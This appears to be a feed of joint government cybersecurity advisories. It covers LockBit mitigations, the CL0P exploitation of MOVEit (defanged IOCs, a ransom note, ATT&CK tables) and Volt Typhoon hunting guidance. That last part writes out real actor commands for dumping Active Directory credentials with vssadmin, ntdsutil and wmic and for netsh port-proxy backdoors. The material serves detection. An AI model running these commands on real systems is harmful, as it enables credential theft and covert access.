The listed mitigations are ordered by MITRE ATT&CK tactic. Mitigations that apply to multiple MITRE ATT&CK tactics are listed under the tactic that occurs earliest in an incident’s lifecycle. For example, account use polices are mitigations for initial access, persistence, privilege escalation, and credential access but would be listed under initial access mitigations.
Implementing multiple mitigations within a defense-in-depth approach can help protect against ransomware, such as LockBit. CERT NZ explains How ransomware happens and how to stop it by applying mitigations, or critical controls, to provide a stronger defense to detect, prevent, and respond to ransomware before an organization’s data is encrypted. By understanding the most common attack vectors, organizations can identify gaps in network defenses and implement the mitigations noted in this advisory to harden organizations against ransomware attacks. In Figure 3, a ransomware attack is broken into three phases:
Figure 3 shows the mitigations/critical controls, as various colored hexagons, working together to stop a ransomware attacker from accessing a network to steal and encrypt data. In the Initial Access phase, mitigations working together to deny an attacker network access include securing internet-exposed services, patching devices, implementing MFA, disabling macros, employing application allowlisting, and using logging and alerting. In the Consolidation and Preparation phase, mitigations working together to keep an attacker from accessing network devices are patching devices, using network segmentation, enforcing the principle of least privilege, implementing MFA, and using logging and alerting. Finally, in the Impact on Target phase, mitigations working together to deny or degrade an attacker’s ability to steal and/or encrypt data includes using logging and alerting, using and maintaining backups, and employing application allowlisting.
Critical Controls Key
Figure 3: Stopping Ransomware Using Layered Mitigations
In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The authoring organizations do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the authoring organizations urge you to promptly report ransomware incidents to your country’s respective authorities.
The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring organizations.
[1] LockBit, BlackCat, and Royal Dominate the Ransomware Scene
[2] Ransomware Diaries: Volume 1
[3] What is LockBit ransomware and how does it operate?
[4] Ransomware Spotlight: LockBit
[5] Analysis and Impact of LockBit Ransomware’s First Linux and VMware ESXi Variant
[6] A first look at the builder for LockBit 3.0 Black
[7] LockBit ransomware gang releases LockBit Green version
[8] LockBit Ransomware Now Targeting Apple macOS Devices
[9] Apple’s Macs Have Long Escaped Ransomware. That May be Changing
[10] Intelligence agency says ransomware group with Russian ties poses 'an enduring threat' to Canada
]]>Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from CL0P ransomware:
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known CL0P ransomware IOCs and TTPs identified through FBI investigations as recently as June 2023.
According to open source information, beginning on May 27, 2023, CL0P Ransomware Gang, also known as TA505, began exploiting a previously unknown SQL injection vulnerability (CVE-2023-34362) in Progress Software's managed file transfer (MFT) solution known as MOVEit Transfer. Internet-facing MOVEit Transfer web applications were infected with a web shell named LEMURLOOT, which was then used to steal data from underlying MOVEit Transfer databases. In similar spates of activity, TA505 conducted zero-day-exploit-driven campaigns against Accellion File Transfer Appliance (FTA) devices in 2020 and 2021, and Fortra/Linoma GoAnywhere MFT servers in early 2023.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of CL0P ransomware and other ransomware incidents.
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
Appearing in February 2019, and evolving from the CryptoMix ransomware variant, CL0P was leveraged as a Ransomware as a Service (RaaS) in large-scale spear-phishing campaigns that used a verified and digitally signed binary to bypass system defenses. CL0P was previously known for its use of the “double extortion” tactic of stealing and encrypting victim data, refusing to restore victim access and publishing exfiltrated data on Tor via the CL0P^_-LEAKS website. In 2019, TA505 actors leveraged CL0P ransomware as the final payload of a phishing campaign involving a macro-enabled document that used a Get2 malware dropper for downloading SDBot and FlawedGrace. In recent campaigns beginning 2021, CL0P preferred to rely mostly on data exfiltration over encryption.
Beyond CL0P ransomware, TA505 is known for frequently changing malware and driving global trends in criminal malware distribution. Considered to be one of the largest phishing and malspam distributors worldwide, TA505 is estimated to have compromised more than 3,000 U.S.-based organizations and 8,000 global organizations.
TA505 has operated:
In a campaign from 2020 to 2021, TA505 used several zero-day exploits to install a web shell named DEWMODE on internet-facing Accellion FTA servers. Similarly, the recent exploitation of MOVEit Transfer, a SQL injection vulnerability was used to install the web shell, which enabled TA505 to execute operating system commands on the infected server and steal data.
In late January 2023, the CL0P ransomware group launched a campaign using a zero-day vulnerability, now catalogued as CVE-2023-0669, to target the GoAnywhere MFT platform. The group claimed to have exfiltrated data from the GoAnywhere MFT platform that impacted approximately 130 victims over the course of 10 days. Lateral movement into the victim networks from the GoAnywhere MFT was not identified, suggesting the breach was limited to the GoAnywhere platform itself. Over the next several weeks, as the exfiltrated data was parsed by the group, ransom notes were sent to upper-level executives of the victim companies, likely identified through open source research. The ransom notes threatened to publish the stolen files on the CL0P data leak site if victims did not pay the ransom amount.
Hello, this is the CL0P hacker group. As you may know, we recently carried out a hack, which was reported in the news on site [redacted]. We want to inform you that we have stolen important information from your GoAnywhere MFT resource and have attached a full list of files as evidence. We deliberately did not disclose your organization and wanted to negotiate with you and your leadership first. If you ignore us, we will sell your information on the black market and publish it on our blog, which receives 30-50 thousand unique visitors per day. You can read about us on [redacted] by searching for CLOP hacker group. You can contact us using the following contact information: unlock@rsv-box[.]com and unlock@support-mult[.]com |
CL0P’s toolkit contains several malware types to collect information, including the following:
MOVEit is typically used to manage an organization’s file transfer operations and has a web application that supports MySQL, Microsoft SQL Server, and Azure SQL database engines. In May 2023, the CL0P ransomware group exploited a SQL injection zero-day vulnerability CVE-2023-34362 to install a web shell named LEMURLOOT on MOVEit Transfer web applications [T1190] [1]. The web shell was initially observed with the name human2.aspx in an effort to masquerade as the legitimate human.aspx file present as part of MOVEit Transfer software. Upon installation, the web shell creates a random 36 character password to be used for authentication. The web shell interacts with its operators by awaiting HTTP requests containing a header field named X-siLock-Comment, which must have a value assigned equal to the password established upon the installation of the web shell. After authenticating with the web shell, operators pass commands to the web shell that can:
Progress Software announced the discovery of CVE-2023-34362 MOVEit Transfer vulnerability and issued guidance on known affected versions, software upgrades, and patching. Based on evidence of active exploitation, CISA added this vulnerability to the Known Exploited Vulnerabilities (KEVs) Catalog on June 2, 2023. This MOVEit Transfer critical vulnerability exploit impacts the following versions of the software [2]:
Due to the speed and ease TA505 has exploited this vulnerability, and based on their past campaigns, FBI and CISA expect to see widespread exploitation of unpatched software services in both private and public networks. For IOCs related to the MOVEit campaign, see table 2.
Below, are open source deployable YARA rules that may be used to detect malicious activity of the MOVEit Transfer Zero Day Vulnerability. For more information, visit GitHub or the resource section of this CSA. [1] [3]:
rule M_Webshell_LEMURLOOT_DLL_1 { |
rule M_Webshell_LEMURLOOT_1 { |
If a victim rebuilds the web server but leaves the database intact, the CL0P user accounts will still exist and can be used for persistent access to the system.
Victims can use the following SQL query to audit for active administrative accounts, and should validate that only intended accounts are present.
SELECT * FROM [].[dbo].[users] WHERE Permission=30 AND Status='active' and Deleted='0'
|
Files |
Hash |
||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
LEMURLOOT Web Shell e.g. human2.aspx |
|
Files |
Hash |
Description |
---|---|---|
larabqFa.exe |
0e3a14638456f4451fe8d76fdc04e591fba942c2f16da31857ca66293a58a4c3 |
Truebot |
%TMP%7ZipSfx.000Zoom.exe |
1285aa7e6ee729be808c46c069e30a9ee9ce34287151076ba81a0bea0508ff7e |
Spawns a PowerShell subprocess which executes a malicious DLL file |
%TMP%7ZipSfx.000ANetDiag.dll |
2c8d58f439c708c28ac4ad4a0e9f93046cf076fc6e5ab1088e8943c0909acbc4 |
Obfuscated malware which also uses long sleeps and debug detection to evade analysis |
AVICaptures.dll |
a8569c78af187d603eecdc5faec860458919349eef51091893b705f466340ecd |
Truebot |
kpdphhajHbFerUr.exe |
c042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c |
Truebot |
dnSjujahur.exe |
c9b874d54c18e895face055eeb6faa2da7965a336d70303d0bd6047bec27a29d |
Truebot |
7ZSfxMod_x86.exe |
d5bbcaa0c3eeea17f12a5cc3dbcaffff423d00562acb694561841bcfe984a3b7 |
Fake Zoom installer - Truebot |
update.jsp |
eb9f5cbe71f9658d38fb4a7aa101ad40534c4c93ee73ef5f6886d89159b0e2c2 |
Java Server Pages (JSP) web shell with some base64 obfuscation |
%TMP%extracted_at_0xe5c8f00.exe |
f2f08e4f108aaffaadc3d11bad24abdd625a77e0ee9674c4541b562c78415765 |
Employs sandbox detection and string obfuscation - appears to be a collection of C# hack tools |
UhfdkUSwkFKedUUi.exe |
ff8c8c8bfba5f2ba2f8003255949678df209dbff95e16f2f3c338cfa0fd1b885 |
Truebot |
Email Address |
Description |
---|---|
unlock@rsv-box[.]com |
CL0P communication email |
unlock@support-multi[.]com |
CL0P communication email |
rey14000707@gmail[.]com |
Login/Download |
gagnondani225@gmail[.]com |
|
Malicious Domain |
---|
http://hiperfdhaus[.]com |
http://jirostrogud[.]com |
http://qweastradoc[.]com |
http://qweastradoc[.]com/gate.php |
http://connectzoomdownload[.]com/download/ZoomInstaller.exe |
https://connectzoomdownload[.]com/download/ZoomInstaller.exe |
http://zoom[.]voyage/download/Zoom.exe |
http://guerdofest[.]com/gate.php |
Certificate Name |
Status |
Date Valid |
Thumbprint |
Serial Number |
---|---|---|---|---|
Savas Investments PTY LTD |
Valid Issuer: Sectigo Public Code Signing CA R36 |
10/7/2022 - 10/7/2023 |
8DCCF6AD21A58226521 E36D7E5DBAD133331C181 |
00-82-D2-24-32-3E-FA-65-06-0B-64- 1F-51-FA-DF-EF-02 |
MOVEit Campaign Infrastructure IP Addresses May/June 2023 |
GoAnywhere Campaign Infrastructure IP Addresses January/February 2023 |
---|---|
104.194.222[.]107 |
100.21.161[.]34 |
138.197.152[.]201 |
104.200.72[.]149 |
146.0.77[.]141 |
107.181.161[.]207 |
146.0.77[.]155 |
141.101.68[.]154 |
146.0.77[.]183 |
141.101.68[.]166 |
148.113.152[.]144 |
142.44.212[.]178 |
162.244.34[.]26 |
143.31.133[.]99 |
162.244.35[.]6 |
148.113.159[.]146 |
179.60.150[.]143 |
148.113.159[.]213 |
185.104.194[.]156 |
15.235.13[.]184 |
185.104.194[.]24 |
15.235.83[.]73 |
185.104.194[.]40 |
162.158.129[.]79 |
185.117.88[.]17 |
166.70.47[.]90 |
185.162.128[.]75 |
172.71.134[.]76 |
185.174.100[.]215 |
173.254.236[.]131 |
185.174.100[.]250 |
185.104.194[.]134 |
185.181.229[.]240 |
185.117.88[.]2 |
185.181.229[.]73 |
185.174.100[.]17 |
185.183.32[.]122 |
185.33.86[.]225 |
185.185.50[.]172 |
185.33.87[.]126 |
188.241.58[.]244 |
185.80.52[.]230 |
193.169.245[.]79 |
185.81.113[.]156 |
194.33.40[.]103 |
192.42.116[.]191 |
194.33.40[.]104 |
195.38.8[.]241 |
194.33.40[.1]64 |
198.137.247[.]10 |
198.12.76[.]214 |
198.199.74[.]207 |
198.27.75[.]110 |
198.199.74[.]207:1234/update.jsp |
206.221.182[.]106 |
198.245.13[.]4 |
209.127.116[.]122 |
20.47.120[.]195 |
209.127.4[.]22 |
208.115.199[.]25 |
209.222.103[.]170 |
209.222.98[.]25 |
209.97.137[.]33 |
213.121.182[.]84 |
45.227.253[.]133 |
216.144.248[.]20 |
45.227.253[.]147 |
23.237.114[.]154 |
45.227.253[.]50 |
23.237.56[.]234 |
45.227.253[.]6 |
3.101.53[.]11 |
45.227.253[.]82 |
44.206.3[.]111 |
45.56.165[.]248 |
45.182.189[.]200 |
5.149.248[.]68 |
45.182.189[.]228 |
5.149.250[.]74 |
45.182.189[.]229 |
5.149.250[.]92 |
5.149.250[.]90 |
5.188.86[.]114 |
5.149.252[.]51 |
5.188.86[.]250 |
5.188.206[.]76 |
5.188.87[.]194 |
5.188.206.76[:]8000/se1.dll |
5.188.87[.]226 |
5.34.178[.]27 |
5.188.87[.]27 |
5.34.178[.]28 |
5.252.23[.]116 |
5.34.178[.]30 |
5.252.25[.]88 |
5.34.178[.]31 |
5.34.180[.]205 |
5.34.180[.]48 |
62.112.11[.]57 |
50.7.118[.]90 |
62.182.82[.]19 |
54.184.187[.]134 |
62.182.85[.]234 |
54.39.133[.]41 |
66.85.26[.]215 |
63.143.42[.]242 |
66.85.26[.]234 |
68.156.159[.]10 |
66.85.26[.]248 |
74.218.67[.]242 |
79.141.160[.]78 |
76.117.196[.]3 |
79.141.160[.]83 |
79.141.160[.]78 |
84.234.96[.]104 |
79.141.161[.]82 |
84.234.96[.]31 |
79.141.173[.]94 |
89.39.104[.]118 |
81.56.49[.]148 |
89.39.105[.]108 |
82.117.252[.]141 |
91.202.4[.]76 |
82.117.252[.]142 |
91.222.174[.]95 |
82.117.252[.]97 |
91.229.76[.]187 |
88.214.27[.]100 |
93.190.142[.]131 |
88.214.27[.]101 |
|
91.222.174[.]68 |
|
91.223.227[.]140 |
|
92.118.36[.]210 |
|
92.118.36[.]213 |
|
92.118.36[.]249 |
|
96.10.22[.]178 |
|
96.44.181[.]131 |
|
5.252.23[.]116 |
|
5.252.25[.]88 |
|
84.234.96[.]104 |
|
89.39.105[.]108 |
|
138.197.152[.]201 |
|
148.113.152[.]144 |
|
198.12.76[.]214 |
|
209.97.137[.]33 |
|
209.222.103[.]170 |
See tables below for referenced CL0P tactics and techniques used in this advisory.
Initial Access |
||
---|---|---|
Technique Title |
ID |
Use |
Exploit Public-Facing Application |
CL0P ransomware group exploited the zero-day vulnerability CVE-2023-34362 affecting MOVEit Transfer software; begins with a SQL injection to infiltrate the MOVEit Transfer web application. |
|
Phishing |
CL0P actors send a large volume of spear-phishing emails to employees of an organization to gain initial access. |
Execution |
||
---|---|---|
Technique Title |
ID |
Use |
Command and Scripting Interpreter: PowerShell |
CL0P actors use SDBot as a backdoor to enable other commands and functions to be executed in the compromised computer. |
|
Command and Scripting Interpreter |
CL0P actors use TinyMet, a small open-source Meterpreter stager to establish a reverse shell to their C2 server. |
|
Shared Modules |
CL0P actors use Truebot to download additional modules. |
Persistence |
||
---|---|---|
Technique Title |
ID |
Use |
Server Software Component: Web Shell |
DEWMODE is a web shell designed to interact with a MySQL database, and is used to exfiltrate data from the compromised network. |
|
Event Triggered Execution: Application Shimming |
CL0P actors use SDBot malware for application shimming for persistence and to avoid detection. |
Privilege Escalation |
||
---|---|---|
Technique Title |
ID |
Use |
Exploitation for Privilege Escalation |
CL0P actors were gaining access to MOVEit Transfer databases prior to escalating privileges within compromised network. |
Defense Evasion |
||
---|---|---|
Technique Title |
ID |
Use |
Process Injection |
CL0P actors use Truebot to load shell code. |
|
Indicator Removal |
CL0P actors delete traces of Truebot malware after it is used. |
|
Hijack Execution Flow: DLL Side-Loading |
CL0P actors use Truebot to side load DLLs. |
Discovery |
||
---|---|---|
Technique Title |
ID |
Use |
Remote System Discovery |
CL0P actors use Cobalt Strike to expand network access after gaining access to the Active Directory (AD) servers. |
Lateral Movement |
||
---|---|---|
Technique Title |
ID |
Use |
Remote Services: SMB/Windows Admin Shares |
CL0P actors have been observed attempting to compromise the AD server using Server Message Block (SMB) vulnerabilities with follow-on Cobalt Strike activity. |
|
Remote Service Session Hijacking: RDP Hijacking |
CL0P ransomware actors have been observed using Remote Desktop Protocol (RDP) to interact with compromised systems after initial access. |
Collection |
||
---|---|---|
Technique Title |
ID |
Use |
Screen Capture |
CL0P actors use Truebot to take screenshots in effort to collect sensitive data. |
Command and Control |
||
---|---|---|
Technique Title |
ID |
Use |
Application Layer Protocol |
CL0P actors use FlawedAmmyy remote access trojan (RAT) to communicate with the Command and Control (C2). |
|
Ingress Tool Transfer |
CL0P actors are assessed to use FlawedAmmyy remote access trojan (RAT) to the download of additional malware components. CL0P actors use SDBot to drop copies of itself in removable drives and network shares. |
Exfiltration |
||
---|---|---|
Technique Title |
ID |
Use |
Exfiltration Over C2 Channel |
CL0P actors exfiltrate data for C2 channels. |
The authoring agencies recommend organizations implement the mitigations below to improve their organization’s security posture in response to threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections to reduce the risk of compromise by CL0P ransomware.
In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring authorities of this CSA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
REFERENCE
[1] Zero-Day Vulnerability in MOVEit Transfer Exploited for Data Theft | Mandiant
[2] MOVEit Transfer Critical Vulnerability (May 2023) - Progress Community
[3] MOVEit Transfer Critical Vulnerability CVE-2023-34362 Rapid Response (huntress.com)
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with CL0P group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, report the incident to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, or CISA at cisa.gov/report.
The information in this report is being provided “as is” for informational purposes only. CISA and the FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
]]>The United States and international cybersecurity authorities are issuing this joint Cybersecurity Advisory (CSA) to highlight a recently discovered cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.
This advisory from the United States National Security Agency (NSA), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Federal Bureau of Investigation (FBI), the Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), the Communications Security Establishment’s Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), and the United Kingdom National Cyber Security Centre (NCSC-UK) (hereafter referred to as the “authoring agencies”) provides an overview of hunting guidance and associated best practices to detect this activity.
One of the actor’s primary tactics, techniques, and procedures (TTPs) is living off the land, which uses built-in network administration tools to perform their objectives. This TTP allows the actor to evade detection by blending in with normal Windows system and network activities, avoid endpoint detection and response (EDR) products that would alert on the introduction of third-party applications to the host, and limit the amount of activity that is captured in default logging configurations. Some of the built-in tools this actor uses are: wmic, ntdsutil, netsh, and PowerShell. The advisory provides examples of the actor’s commands along with detection signatures to aid network defenders in hunting for this activity. Many of the behavioral indicators included can also be legitimate system administration commands that appear in benign activity. Care should be taken not to assume that findings are malicious without further investigation or other indications of compromise.
Download the PDF version of this report (723 KB)
This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques.
The authoring agencies are aware of recent People’s Republic of China (PRC) state-sponsored cyber activity and have identified potential indicators associated with these techniques. This advisory will help net defenders hunt for this activity on their systems. It provides many network and host artifacts associated with the activity occurring after the network has been initially compromised, with a focus on command lines used by the cyber actor. An Indicators of compromise (IOCs) summary is included at the end of this advisory.
Especially for living off the land techniques, it is possible that some command lines might appear on a system as the result of benign activity and would be false positive indicators of malicious activity. Defenders must evaluate matches to determine their significance, applying their knowledge of the system and baseline behavior. Additionally, if creating detection logic based on these commands, network defenders should account for variability in command string arguments, as items such as ports used may be different across environments.
The actor has leveraged compromised small office/home office (SOHO) network devices as intermediate infrastructure to obscure their activity by having much of the command and control (C2) traffic emanate from local ISPs in the geographic area of the victim. Owners of SOHO devices should ensure that network management interfaces are not exposed to the Internet to avoid them being re-purposed as redirectors by malicious actors. If they must be exposed to the Internet, device owners and operators should ensure they follow zero trust principles and maintain the highest level of authentication and access controls possible.
The actor has used Earthworm and a custom Fast Reverse Proxy (FRP) client with hardcoded C2 callbacks [T1090] to ports 8080, 8443, 8043, 8000, and 10443 with various filenames including, but not limited to:
cisco_up.exe, cl64.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPreSV.exe, and WmiPrvSE.exe.
The actor has executed the following command to gather information about local drives [T1082]:
cmd.exe /C "wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename"
This command does not require administrative credentials to return results. The command uses a command prompt [T1059.003] to execute a Windows Management Instrumentation Command Line (WMIC) query, collecting information about the storage devices on the local host, including drive letter, file system (e.g., new technology file system [NTFS]), free space and drive size in bytes, and an optional volume name. Windows Management Instrumentation (WMI) is a built-in Windows tool that allows a user to access management information from hosts in an enterprise environment. The command line version of WMI is called WMIC.
By default, WMI Tracing is not enabled, so the WMI commands being executed and the associated user might not be available. Additional information on WMI events and tracing can be found in the References section of the advisory.
The actor may try to exfiltrate the ntds.dit file and the SYSTEM registry hive from Windows domain controllers (DCs) out of the network to perform password cracking [T1003.003]. (The ntds.dit file is the main Active Directory (AD) database file and, by default, is stored at %SystemRoot%NTDSntds.dit. This file contains information about users, groups, group memberships, and password hashes for all users in the domain; the SYSTEM registry hive contains the boot key that is used to encrypt information in the ntds.dit file.) Although the ntds.dit file is locked while in use by AD, a copy can be made by creating a Volume Shadow Copy and extracting the ntds.dit file from the Shadow Copy. The SYSTEM registry hive may also be obtained from the Shadow Copy. The following example commands show the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.
cmd /c vssadmin create shadow /for=C: > C:WindowsTemp<filename>.tmp cmd /c copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit C:WindowsTemp > C:WindowsTemp<filename>.tmp
The built-in Ntdsutil.exe tool performs all these actions using a single command. There are several ways to execute Ntdsutil.exe, including running from an elevated command prompt (cmd.exe), using WMI/WMIC, or PowerShell. Defenders should look for the execution of Ntdsutil.exe commands using long, short, or a combination of the notations. For example, the long notation command activate instance ntds ifm can also be executed using the short notation ac i ntds i. Table 1 provides the long and short forms of the arguments used in the sample Ntdsutil.exe command, along with a brief description of the arguments.
Long form |
Short form |
Description |
---|---|---|
activate instance % |
ac i % |
Sets variable % as the active instance for ntdsutil to use |
ifm |
i |
Install from media (ifm). Creates installation media to be used with DCPromo so the server will not need to copy data from another Domain Controller on the network |
The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe. Each of the following actor commands is a standalone example; multiple examples are provided to show how syntax and file paths may differ per environment.
wmic process call create "ntdsutil "ac i ntds" ifm "create full C:WindowsTemppro wmic process call create "cmd.exe /c ntdsutil "ac i ntds" ifm "create full C:WindowsTempPro" wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp" "cmd.exe" /c wmic process call create "cmd.exe /c mkdir C:windowsTempMcAfee_Logs & ntdsutil "ac i ntds" ifm "create full C:WindowsTempMcAfee_Logs" cmd.exe /Q /c wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp" 1> \127.0.0.1ADMIN$<timestamp value> 2>&1
Note: The <timestamp value> would be an epoch timestamp following the format like “__1684956600.123456”.
Each actor command above creates a copy of the ntds.dit database and the SYSTEM and SECURITY registry hives in the C:WindowsTemp<folder> directory, where <folder> is replaced with the path specified in the command (e.g., pro, tmp, or McAfee_Logs). By default, the hidden ADMIN$ share is mapped to C:Windows, so the last command will direct standard output and error messages from the command to a file within the folder specified.
The actor has also saved the files directly to the C:WindowsTemp and C:UsersPublic directories, so the entirety of those directory structures should be analyzed. Ntdsutil.exe creates two subfolders in the directory specified in the command: an Active Directory folder that contains the ntds.dit and ntds.jfm files, and a registry folder that contains the SYSTEM and SECURITY hives. Defenders should look for this folder structure across their network:
<path specified in command>Active Directoryntds.dit <path specified in command>Active Directoryntds.jfm <path specified in command>registrySECURITY <path specified in command>registrySYSTEM
When one of the example commands is executed, several successive log entries are created in the Application log, under the ESENT Source. Associated events can be viewed in Windows Event Viewer by navigating to: Windows Logs | Application. To narrow results to relevant events, select Filter Current Log from the Actions menu on the right side of the screen. In the Event sources dropdown, check the box next to ESENT, then limit the logs to ID numbers 216, 325, 326, and 327. Clicking the OK box will apply the filters to the results.
Since ESENT logging is used extensively throughout Windows, defenders should focus on events that reference ntds.dit. If such events are present, the events’ details should contain the file path where the file copies were created. Since these files can be deleted, or enhanced logging may not be configured on hosts, the file path can greatly aid in a hunt operation. Identifying the user associated with this activity is also a critical step in a hunt operation as other actions by the compromised—or actor-created—user account can be helpful to understand additional actor TTPs, as well as the breadth of the actor's actions.
Note: If an actor can exfiltrate the ntds.dit and SYSTEM registry hive, the entire domain should be considered compromised, as the actor will generally be able to crack the password hashes for domain user accounts, create their own accounts, and/or join unauthorized systems to the domain. If this occurs, defenders should follow guidance for removing malicious actors from victim networks, such as CISA's Eviction Guidance for Network Affected by the SolarWinds and Active Directory/M365 Compromise.
In addition to the above TTPs used by the actor to copy the ntds.dit file, the following tools could be used by an actor to obtain the same information:
Best practices for securing ntds.dit include hardening Domain Controllers and monitoring event logs for ntdsutil.exe and similar process creations. Additionally, any use of administrator privileges should be audited and validated to confirm the legitimacy of executed commands.
The actor has used the following commands to enable port forwarding [T1090] on the host:
"cmd.exe /c "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=<rfc1918 internal ip address> connectport=8443 protocol=tcp"" "cmd.exe /c netsh interface portproxy add v4tov4 listenport=50100 listenaddress=0.0.0.0 connectport=1433 connectaddress=<rfc1918 internal ip address>"
where <rfc1918 internal ip address> is replaced with an IPv4 address internal to the network, omitting the < >’s.
Netsh is a built-in Windows command line scripting utility that can display or modify the network settings of a host, including the Windows Firewall. The portproxy add command is used to create a host:port proxy that will forward incoming connections on the provided listenaddress and listenport to the connectaddress and connectport. Administrative privileges are required to execute the portproxy command. Each portproxy command above will create a registry key in the HKLMSYSTEMCurrentControlSetServicesPortProxyv4tov4tcp path. Defenders should look for the presences of keys in this path and investigate any anomalous entries.
Note: Using port proxies is not common for legitimate system administration since they can constitute a backdoor into the network that bypasses firewall policies. Administrators should limit port proxy usage within environments and only enable them for the period of time in which they are required.
Defenders should also use unusual IP addresses and ports in the command lines or registry entries to identify other hosts that are potentially included in actor actions. All hosts on the network should be examined for new and unusual firewall and port forwarding rules, as well as IP addresses and ports specified by the actor. If network traffic or logging is available, defenders should attempt to identify what traffic was forwarded though the port proxies to aid in the hunt operation. As previously mentioned, identifying the associated user account that made the networking changes can also aid in the hunt operation.
Firewall rule additions and changes can be viewed in Windows Event Viewer by navigating to:
Applications and Service Logs | Microsoft | Windows | Windows Firewall With Advanced Security | Firewall.
In addition to host-level changes, defenders should review perimeter firewall configurations for unauthorized changes and/or entries that may permit external connections to internal hosts. The actor is known to target perimeter devices in their operations. Firewall logs should be reviewed for any connections to systems on the ports listed in any portproxy commands discovered.
The actor has used the following PowerShell [T1059.001] command to identify successful logons to the host [T1033]:
Get-EventLog security -instanceid 4624
Note: Event ID 4624 is logged when a user successfully logs on to a host and contains useful information such as the logon type (e.g., interactive or networking), associated user and computer account names, and the logon time. Event ID 4624 entries can be viewed in Windows Event Viewer by navigating to:
Windows Logs | Security. PowerShell logs can be viewed in Event Viewer: Applications and Service Logs | Windows PowerShell.
This command identifies what user account they are currently leveraging to access the network, identify other users logged on to the host, or identify how their actions are being logged. If the actor is using a password spray technique [T1110.003], there may be several failed logon (Event ID 4625) events for several different user accounts, followed by one or more successful logons (Event ID 4624) within a short period of time. This period may vary by actor but can range from a few seconds to a few minutes.
If the actor is using brute force password attempts [T1110] against a single user account, there may be several Event ID 4625 entries for that account, followed by a successful logon Event ID 4624. Defenders should also look for abnormal account activity, such as logons outside of normal working hours and impossible time-and-distance logons (e.g., a user logging on from two geographically separated locations at the same time).
The actor regularly employs the use of Impacket’s wmiexec, which redirects output to a file within the victim host's ADMIN$ share (C:Windows) containing an epoch timestamp in its name. The following is an example of the "dir" command being executed by wmiexec.py:
cmd.exe /Q /c *dir 1> \127.0.0.1ADMIN$__1684956600.123456 2>&1
